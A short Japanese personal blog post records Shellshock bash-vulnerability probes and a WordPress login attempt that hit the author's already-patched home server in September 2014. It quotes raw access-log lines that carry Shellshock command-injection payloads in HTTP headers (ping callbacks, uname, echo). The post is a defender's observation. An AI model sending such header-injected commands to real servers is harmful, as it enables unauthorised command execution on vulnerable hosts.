あっきぃ日誌

鉄道ブログのような技術系ブログのようななにか

bashのアレ

自宅鯖にもいくつか来ていた。対策済みだけど。

209.126.***.*** - - [25/Sep/2014:12:32:37 +0900] "GET / HTTP/1.0" 200 12268 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.***.*** - - [25/Sep/2014:19:58:00 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 11160 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
54.251.***.*** - - [26/Sep/2014:10:48:41 +0900] "GET / HTTP/1.1" 200 12266 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"

一個、これはWordPress向けのアタックのようだけれど、これはこれでまづいんじゃないかとおもた。UA偽装に失敗してるのかなんなのか微妙な名前である。あとでフィルタするか。

108.59.***.*** - - [29/Sep/2014:13:09:46 +0900] "POST /wp-login.php HTTP/1.1" 200 1952 "http://eject.kokuda.org/wp-login.php" "[% tools.ua.random() %]"